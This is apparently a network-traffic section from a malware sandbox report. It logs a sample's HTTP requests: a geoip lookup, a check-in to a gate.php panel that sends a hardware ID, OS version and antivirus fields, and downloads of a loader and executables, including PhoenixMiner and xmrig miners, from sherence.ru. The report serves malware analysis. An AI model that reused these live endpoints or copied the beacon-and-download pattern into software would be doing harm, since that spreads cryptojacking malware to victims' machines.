Network Analysis

GET /geoip HTTP/1.1 Host: api.ip.sb Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sun, 19 Sep 2021 02:28:59 GMT Content-Type: application/json; charset=utf-8 Content-Length: 348 Connection: keep-alive Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: no-cache Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hNQzG1yZ9fiZOIVo35eLlcfd6nDnUAyjiHxl27ozyXPjtRzvicfuiWp2W9JEzZFO7%2B58otZLBnIoue4rKEfc2p7boV0LUzXZa1ALBEPrOvHcvU7xZ6gcMcm7tg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 690f623dce28fce5-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET //cisCheckerstroke.php HTTP/1.1 Host: sh1729062.b.had.su Connection: Keep-Alive

HTTP/1.1 404 Not Found Server: ddos-guard Connection: keep-alive Keep-Alive: timeout=60 Set-Cookie: __ddg1=IdlaMIeVmsWV14jslWaB; Domain=.had.su; HttpOnly; Path=/; Expires=Mon, 19-Sep-2022 02:30:47 GMT Date: Sun, 19 Sep 2021 02:30:45 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 218

GET //gate.php?hwid=7C6024AD&os=6.1.7601&av= HTTP/1.1 Host: sh1729062.b.had.su

HTTP/1.1 200 OK Server: ddos-guard Connection: keep-alive Keep-Alive: timeout=60 Set-Cookie: __ddg1=ZRkufx4u5J5pvROQgyUa; Domain=.had.su; HttpOnly; Path=/; Expires=Mon, 19-Sep-2022 02:30:50 GMT Date: Sun, 19 Sep 2021 02:30:48 GMT Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/7.1.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=9b02f2869d7150800b12f5bff8b644c9; path=/ Transfer-Encoding: chunked

GET //loader.txt HTTP/1.1 Host: sh1729062.b.had.su

GET /123123.exe HTTP/1.1 Host: sherence.ru Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sun, 19 Sep 2021 02:29:20 GMT Content-Type: application/x-msdos-program Content-Length: 208896 Connection: keep-alive last-modified: Sat, 18 Sep 2021 23:24:58 GMT etag: "33000-5cc4d5b39b6d2" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 3 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nrP8VnTTssByYFalFe%2FMXezHK0MGfrrc2Z%2FxZWpIWolTZKO0luDnfSNWjNNIKtj2n2niHzxxdBOdETRYJXYz34Pi8HMKfEvn9e0K1ODb53Okn6fvvyBoHl3%2F4H0U9A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 690f62be3bfa0a72-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET /Stub1.exe HTTP/1.1 Host: sherence.ru

HTTP/1.1 200 OK Date: Sun, 19 Sep 2021 02:29:20 GMT Content-Type: application/x-msdos-program Content-Length: 484352 Connection: keep-alive last-modified: Sat, 18 Sep 2021 13:56:58 GMT etag: "76400-5cc456be52150" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 1 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XRWYxPlOUyx0AwGNeY75A0M9QNNCnP7BVZZLXTzRnUkyGL5jlDMpB5JU1dxqNx3njrDAr%2FMOzu6RZdrKaeOg2zV3dcBF5URYTa05ByC%2BBORjv%2FsXfFTru9XSNseUgg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 690f62c32e8f0a72-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET /PhoenixMiner.exe HTTP/1.1 Host: sherence.ru Connection: Keep-Alive

GET /xmrig.exe HTTP/1.1 Host: sherence.ru Connection: Keep-Alive

GET /323.exe HTTP/1.1 Host: sherence.ru Connection: Keep-Alive

HTTP/1.1 404 Not Found Date: Sun, 19 Sep 2021 02:30:51 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 12 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Sbjv%2FGQuSBPiKx%2FnlJI2WkzAubNhwJvjUQonxe8gfmp0VwvOFYmOoJh3EdLF6SntowSLTObxhbOFMG1BzICvc5HtfSmrBohwdMCj%2BK2bu%2BK09aHM1NKz9%2FTlB4yU7A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 690f64fb8c190a6e-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400